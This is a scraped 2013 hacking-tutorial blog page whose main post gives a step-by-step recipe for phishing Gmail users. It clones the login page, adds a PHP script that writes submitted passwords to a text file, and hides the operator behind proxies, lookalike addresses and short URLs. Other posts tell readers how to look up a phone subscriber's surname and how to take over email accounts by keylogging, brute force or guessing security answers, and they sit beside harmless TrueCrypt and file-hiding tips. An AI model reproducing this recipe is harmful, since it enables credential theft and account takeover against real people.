Warning - This Website is only for education purposes, By reading these articles you agree that HackingBytes is not responsible in any way for any kind of damage caused by the information provided in these articles.


Hide Data Behind Any File :Steganography

Steganography is the art and science of hiding messages, Images, Data .etc in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, you can Hide Data Behind Images without using any software

Password Protect File/Hard Disk : Cryptography

Today in a typical middle class family everyone in the family uses the same computer , There are times when we need to keep our file ,folders, Hard Drivers, usb's private .The best way to protect your file ,folders, hard disks, thumb drives ..etc, is by encrypting them (i.e password protect ) By this way there's no chance of the file or folder being accessed without the password ,To achieve this, I use True crypt a Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

Trick To Find User Surname Of Any Reliance Mobile Number

Basically this website is for recharge but it helps you to get information about user of that mobile number. So lets dive into it. 1. Go to this Website 2. Enter Mobile Number in Reliance Subscriber Number. 3. Email address is optional so you don't need to enter. 4. Done!!!

Windows 8 E Book Free Download

This book covers most of the problems users are facing with Windows 8. Windows 8 is totally different from older version of Windows and it does not has start button. So people are facing problems while using it. This new version of Windows is also optimized for touchscreen. According to security researchers, Windows 8 is also the most secure operating system from Microsoft.

Yahoo Session Cookies hacking

A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. These cookies can be stored in your browser.you can see your cookies by typing the following script in your browser. p>

Thursday, February 28, 2013

Gmail Hacking Step By Step

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the


Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Now you need to create login.php
 so you need to open the notepad and type as
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.

Step 8: 
create an email with gmail keyword.
 like : gmailxyz@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Ways to Hack E-Mail Accounts

The Basic level Hacking is Email Account Hacking.  Everyone like to do first email account hacking only.  So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking .  Here is some of them :

  1. Social Engineering
    • Phishing
  2. Brute Force Attack
  3.  Keylogger
  4.  Guessing the Answer for the Security Question

Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim.  Hackers will send mail to victim.  The contents will be related to the victim.


✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:


 It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that the mail sites will ask for the security questions to retrieve the mail account?  You can hack the mail account simply guessing the answer.  If the victim is your friend ,then it may very easy to hack. 

Brute Force Attack:

A famous and traditional attacking method .  In this method ,the password will be found by trying all possible passwords with any program or software.


 It is one of the spyware which will capture what you type in the keyboard.  so whenever you type the username and password ,it will simply capture.

   It is software program which will be attached with any softwares and send to victim.  While victim install the software ,the keylogger also start to work.  Keyloggers are exe files.

Introduction To Ethical Hacking

What is computer hacking?

Hacking is the process of taking advantage of weakness in a computer or computer network to accomplish his goal. The person who is engaging in hacking activities  called as 'Hacker'.  Hackers may be motivated by a multiple reasons, such as profit, protest, challenge or just for fun.


One who breaks security on a system. Coined ca. 1985 by hackers in defense against journalistic misuse of hacker (q.v., sense 8). An earlier attempt to establish ‘worm’ in this sense around 1981–82 on Usenet was largely a failure.

Use of both these neologisms reflects a strong revulsion against the theft and vandalism perpetrated by cracking rings. While it is expected that any real hacker will have done some playful cracking and knows many of the basic techniques, anyone past larval stage is expected to have outgrown the desire to do so except for immediate, benign, practical reasons (for example, if it’s necessary to get around some security in order to get some work done). Thus, there is far less overlap between hackerdom and crackerdom than the mundane reader misled by sensationalistic journalism might expect. Crackers tend to gather in small, tight-knit, very secretive groups that have little overlap with the huge, open poly-culture this lexicon describes; though crackers often like to describe themselves as hackers, most true hackers consider them a
separate and lower form of life.

It’s clear that the term cracker is absolutely meant to be derogatory. One
shouldn’t take the tone too seriously though, as The Jargon File is done with a
sense of humor, and the above is said with a smile. As we can see from the
above, illegal or perhaps immoral activity is viewed with disdain by the “true
hackers,” whomever they may be. It also makes reference to cracker being a
possible intermediate step to hacker, perhaps something to be overcome.

Script Kiddie

The term script kiddie has come into vogue in recent years. The term refers to
crackers who use scripts and programs written by others to perform their intrusions.
If one is labeled a “script kiddie,” then he or she is assumed to be incapable
of producing his or her own tools and exploits, and lacks proper
understanding of exactly how the tools he or she uses work. As will be apparent
by the end of this chapter, skill and knowledge (and secondarily, ethics) are the
essential ingredients to achieving status in the minds of hackers. By definition,
a script kiddie has no skills, no knowledge, and no ethics.


A phreak is a hacker variant, or rather, a specific species of hacker. Phreak is
short for phone phreak (freak spelled with a ph, like phone is). Phreaks are
hackers with an interest in telephones and telephone systems. Naturally, there
has been at times a tremendous amount of overlap between traditional hacker
roles and phreaks.

White Hat/Black Hat/Gray Hat

White Hat Hacker:

White Hat hackers are good guys who does the hacking for defensing.  They probably work an organization for providing security.

Black Hat Hacker

Black hat hackers are bad guys(the malicious hackers or crackers).  They usually steal the other bank information and steal the money.
They use their skills for illegal purposes.
They are creators of viruses,malware,spyware.
They will destroy your pc.

Gray Hat Hackers

Grey hats are hackers who may work offensively or defensively, depending on the situation.
This is the dividing line between hacker and cracker. Both are powerful forces on the Internet,
and both will remain permanently. And some individuals qualify for both categories. The
existence of such individuals further clouds the division between these two groups of people.
In addition to these groups, there are self-proclaimed ethical hackers, who are interested in
hacker tools mostly from a curiosity standpoint. They may want to highlight security problems
in a system or educate victims so they secure their systems properly. These hackers are
doing their “victims” a favor. For instance, if a weakness is discovered in a service offered by
an investment bank, the hacker is doing the bank a favor by giving the bank a chance to rectify
the vulnerability.

Password Protect File/Hard Disk : Cryptography


Today in a typical middle class family everyone in the family uses the same computer , There are times when we need to keep our file ,folders, Hard Drivers, usb's  private .The best way to protect your file ,folders, hard disks, thumb drives ..etc, is  by encrypting them (i.e password protect ) By this way there's no chance of the file or folder  being accessed without the password  ,To achieve this,  I use True crypt a Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

About True Crypt 

True Crypt is a software system for establishing and maintaining an on-the-fly-encrypted volume (data storage device). On-the-fly encryption means that data is automatically encrypted right before it is saved and decrypted right after it is loaded, without any user intervention. No data stored on an encrypted volume can be read (decrypted) without using the correct password/key file(s) or correct encryption keys. Entire file system is encrypted (e.g., file names, folder names, contents of every file, free space, meta data, etc).

How To Use True Crypt 

1. First Download Truecrypt  Free from Here

Hide Your Data Behind Any File :Stegnography

Steganography is the art and science of hiding messages, Images, Data .etc  in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, you can Hide Data  Behind  Images without using any software

Hide Data Behind Images Without Using Any Software
1. Create a folder in your C drive and name it as “hide

2. Copy all the images you want to hide and also the image behind which you want hide into this directory.

3. Now select the images you want to hide and add them to archive i.e keep them in winrar.
Now you will see one more file named “hide.rar” in your directory.

4. Now open command prompt and change your root to your current directory as shown in the figure and type the following command.
          Copy /b aish.jpg + hide.rar output.jpg

  • Here “aish.jpg “ is the image behind which you want to hide.
  • “hide.rar” is the file of images to be hidden.
  • “output.jpg “ is the output file that we want.
After executing the following command, we will see an extra image called “output.jpg” as shown in the figure.

Now you can delete all the files except “output.jpg”.If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar.

This tutorial can be used for any type of files like mp3,wmv,txt etc


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